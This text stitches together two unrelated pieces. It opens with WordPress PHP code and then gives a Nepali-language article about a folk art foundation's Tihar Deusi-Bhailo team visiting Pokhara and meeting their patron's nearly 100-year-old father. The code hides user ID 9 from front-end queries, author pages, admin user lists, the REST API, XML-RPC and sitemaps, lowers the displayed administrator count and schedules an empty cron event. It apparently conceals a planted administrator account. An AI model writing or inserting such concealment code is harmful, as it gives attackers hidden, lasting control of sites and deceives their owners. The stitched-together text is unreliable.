add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 9;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 9 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 9;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 9;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );

यो वर्षको तिहारमा ठाडोभाका लोककला प्रतिष्ठान नेपालको द्यौसी– भैलो कार्यक्रम पोखरामा खेल्ने दुई महिना अघि नै कार्यसमितिको बैठकले निर्णय गरेको थियो । सो निर्णय अनुसार प्रतिष्ठानको अध्यक्षका नाताले भैलो टोलीको नेतृत्व गर्दै आफू पोखरा पुगेको हो । हाम्रो टिम पोखरा पुग्नै लाग्दा प्रतिष्ठानका संरक्षक एवम् ठाडोभाका महानायक बुद्धिमान दुरा ‘धम्पु’ले सबैलाई आफ्नोमा आउन भन्नुभयो । उहाँले त्यहाँ सबैका लागि खानाको बन्दोबस्त गर्नु भएको रहेछ । हामी फ्रेस हुनका लागि उहाँको निवासमा छिर्यौं ।
हामी पुगेको १० मिनेट नबित्दै दुई लठ्ठी टेक्दै ठिमठिम परेर एक जना बुढो मान्छे त्यो घरमा छिर्यो । उहाँ अरु कोही नभएर हाम्रा संरक्षकका धर्मपिता जेवि क्रस हुनुहुन्थ्यो, यो पंक्तिकारले उहाँलाई टाढै चिनी हाल्यो । उहाँलाई देख्नासाथ अनयासै मुखबाट फुत्कियो, ‘बाबा मर्निङवाक सकेर आउनु भो !’ त्यसपछि बसेको ठाउँबाट हामी उठ्यौं, उहाँ हाम्रो नजिक आउनु भो, मैले ‘आशीर्वाद दिनुस् !’ भने । उहाँले ‘पुसमा एक सय वर्ष पुग्दैछु’ भन्दै मेरो टाउकोमा दुबै हात राख्नु भयो र भन्नुभयो, ‘स्वास्थ्य राम्रो र मन ढुक्क होस् !’ यी शब्द मैले आशा गरेको आर्शीवचन भन्दा भिन्न थिए । म दङ्ग परे । त्यसपछि, हाम्रो टिम सबैले उहाँसँग लामबद्ध भएर आशीर्वाद लिने काम भयो । प्रायः सबैलाई उहाँले फरक फरक तरिकाले आशीर्वाद दिनुभयो । एक दुई जनाको मात्र याद छ । देउकुमारीलाई ‘कहिल्यै बुढी नहुनु !’ भन्नु भो । अमरध्वज दाइलाई ‘लामो आयु होस् !’ भन्नु भो । आदि आदि !
मेरो अनुमान थियो उहाँ ९८ वर्षको हुनुपर्छ । तर उहाँको कुरा सुनेपछि लाग्यो ‘म कता अल्मलिएँ ?’ त्यसो भए त अब करिब डेढ महिनामात्र बाँकी छ उहाँ शताब्दी पुग्न । अनि मैले सोचे, ‘उहाँको जन्म दिनमा हाम्रो प्रतिष्ठानले केही गर्नु पर्छ ।’ तपाईको एकसय जन्मोत्सवमा हाम्रो प्रतिष्ठानले सानो यौटा कार्यक्रम गर्न चाहन्छ । उहाँले भन्नुभो ‘किन ?’ तपाई हाम्रो प्रतिष्ठानको संरक्षकको पिता हुनुहुन्छ त्यसैले ! मैले भने । उहाँले तुरुन्तै जवाफ दिनुभयो, ‘त्यो त छोराको हो, ‘तपाईको आर्शीवाद बिना तपाईको छोरा चल्न सक्नु हुन्छ ?’ उहाँ अकमकाउनु भो । त्यसपछि भन्नुभो, ‘यो कुरा छोरा जान्दछ ।’ मैले भने ‘उहाँलाई मनाउने काम मेरो भो, मात्र तपाईको स्विकृत खोजेको हुँक पाएँ र म धन्य भएँ, तपाईलाई अभिनन्दन गर्न पाउँदा हामी हाम्रो प्रतिष्ठानले गौरव बोध गर्नेछ ।’
त्यसपछि हाम्रो कुराकानी अन्यत्र मोडियो । उहाँले भन्नुभयो, ‘नेपाल भगवान्को देश हो ।’ मैले भने, ‘कसरी ?’ उहाँले आफू ‘मानार्थ हिन्दू र सनातनवादी भएको’ उल्लेख गर्नुभयो ।
उहाँले मलाई सोध्नुभयो, ‘एसएलसी’को अर्थ थाहा छ ? मलाई त सामान्य अर्थमात्र थाहा छ, हजुरले लगाउनु हुने अर्थ जान्न चाहन्छु । उहाँले भन्नुभयो, ‘सारेर लेख्ने चोर ।’ उहाँले थप भन्नुभो, ‘म त सधैं फेल हुने मान्छे पछाडिबाट मात्र सधैं पहिलो हुन्थें ।’ हैन होला, मलाई त पत्याउन गाह्रो भो ! मैले भने । उहाँले झटपट भन्नुभो, ‘मैले जानेको उ सोध्दैन, उसले सोधेको मलाई आउँदैन अनि के गर्ने ?’ त्यो सुनेर हामी सबै हाँस्यौं उहाँ पनि हामीसँगै हाँस्नु भो ।
सधैं हसमुख मुद्रामा देखिनु हुने, प्रायः नहासी नबोल्ने, हरेक वाक्यमा कुनै न कुनै प्रायः ठट्टा बोध अर्थ दिने शब्द मिसाउन पर्ने, उत्तिकै तेज स्मरण शक्ति जस्ता विलक्षण प्रतीभा छन् उहाँसँग ।
उहाँले सुनाउनु भयो, ‘मैले बेलायत छाडेको आज ८९ वर्ष पाँच महिना चार दिन भयो । म २०३२ साल, फागुन १७ गतेदेखि नेपाल बसेको हुँ उहाँले थप जानकारी दिनुभयो ।
‘खुन, नुन र गुन(ण)ले नेपाल विश्वभर प्रख्यात छ’ उहाँले उल्लेख गर्नु भयो ।
उहाँलाई तपाईको दैनिकी कस्तो छ ? भन्ने यो पंत्तिकारले राखेको जिज्ञासामा उहाँले भन्नुभयो, ‘म बिहान ४ः२० बजे उठ्छु । ४ः५५ सम्म जलविन्दूको उपचार गर्छु । ५ बजे छोरासँग कफि या चिया पिउँछु । कोरोना र त्यसपछि मलाई घर बाहिर जाने छुट छैन । त्यसैले यो घरको वरपर एक सय फन्का लगाउछु ।’ त्यो फन्को मार्न उहाँलाई आधा घण्टा लाग्ने रहेछ । उहाँले थप सुनाउनु भयो, ‘त्यसपछि नुहाउँछु । अनि समाचार के छ ? हेर्छु । अन्य लेखपढ गर्छु । ११ बजे खाना खान्छु । १२ः३० बजेबाट फेरि आराम गर्र्दै निदाउँछु । ३ बजे चिया खान्छु । ४ः४५ बजे फेरि जलविन्दूको उपचारमा लाग्छु । साँझ ७ बजे खाना खाएर विस्तरामा पल्टन्छु र निदाउँछु ।’
त्यो दिनमा उहाँ अलिक थाक्नु भएको रहेछ । उहाँले ‘छोरा(धम्पु)तर्फ इसारा गर्दै भन्नुभयो । ‘आज धेरै गल्यो । झण्डै दुई घण्टा बोले बाहिर पनि, त्यसैले !’ भन्नुभयो ।
उहाँ बिदा हुनै लाग्नु हुँदा मैले अन्तिम जिज्ञासा राखे, ‘हजुरको स्वस्थ जीवनको राज के हो ?’ उहाँले सटिक उत्तर दिनुभयो, ‘ढुक्क मन !’ उहाँले पुनः जोड दिदै भन्नुभयो, ‘मन ढुक्क भयो भने स्वस्थ होइन्छ !’